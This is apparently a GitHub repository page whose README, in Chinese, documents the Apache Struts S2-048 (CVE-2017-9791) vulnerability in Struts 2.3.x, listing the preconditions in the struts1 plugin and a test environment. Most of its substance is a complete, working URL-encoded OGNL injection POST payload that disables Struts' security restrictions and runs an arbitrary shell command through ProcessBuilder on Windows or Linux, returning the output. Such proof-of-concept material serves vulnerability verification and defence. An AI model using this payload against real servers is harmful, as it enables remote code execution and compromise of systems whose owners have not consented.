Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md
burp-poc.png
burp-poc.txt
firefox-poc.png
firefox-post.txt
poc.py
py-poc.png

README.md

S2-048(CVE-2017-9791)

Affected Version

Struts 2.3.x

此外需要满足下面的条件:

  1. 调用非默认插件 struts2-struts1-plugin.jar

  2. 代码中创建 ActionMessage 对象使用 字符串拼接的形式,如下:

    messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));

poc

漏洞环境使用 Struts-2.3.32 版本 的 showcase 应用

Py 脚本验证 (poc.py)

Forefox Hackbar 验证:

POST 数据包:

age=1&cmd=echo Affected by S2-048&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%23parameters.cmd%5B0%5D%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=test

结果:

References

  1. https://cwiki.apache.org/confluence/display/WW/S2-048
  2. https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-048